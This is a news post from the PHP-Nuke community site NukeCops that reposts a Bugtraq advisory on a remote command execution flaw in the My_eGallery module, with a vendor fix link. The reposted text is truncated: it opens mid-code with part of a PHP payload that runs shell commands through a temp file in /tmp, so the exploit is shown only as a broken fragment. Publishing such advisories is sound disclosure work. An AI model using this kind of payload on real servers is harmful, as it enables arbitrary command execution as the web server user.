Date: Saturday, November 29 @ 14:21:07 CET
Topic: PHP-Nuke


Here is a posting on Bugtraq about the exploits that have been discussed in the forums recently here at nuke cops.
Keep in mind this individual has not been known in the past to verify his vulnerabilities, but I would recommend testing this if you are using eGallery. The author discusses its use with Postnuke, but I would confirm or deny this with PHP-Nuke.
J.

Product: My_eGallery Versions affected: all /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); print_output(); ?> This allows execution of any command on the server with My_eGallery, under the privileges of the Web server (usually apache or httpd). 3. Solution ----------- Vendor was contacted and promptly replied. Fix is available at the vendor's site: http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil e=index&req=viewdownload&cid=5 As this was seen being exploited in the wild, users are urged to upgrade to the latest version as soon as possible. Regards, Bojan Zdrnja CISSP





This article comes from NukeCops
http://www.nukecops.com

The URL for this story is:
http://www.nukecops.com/modules.php?name=News&file=article&sid=1063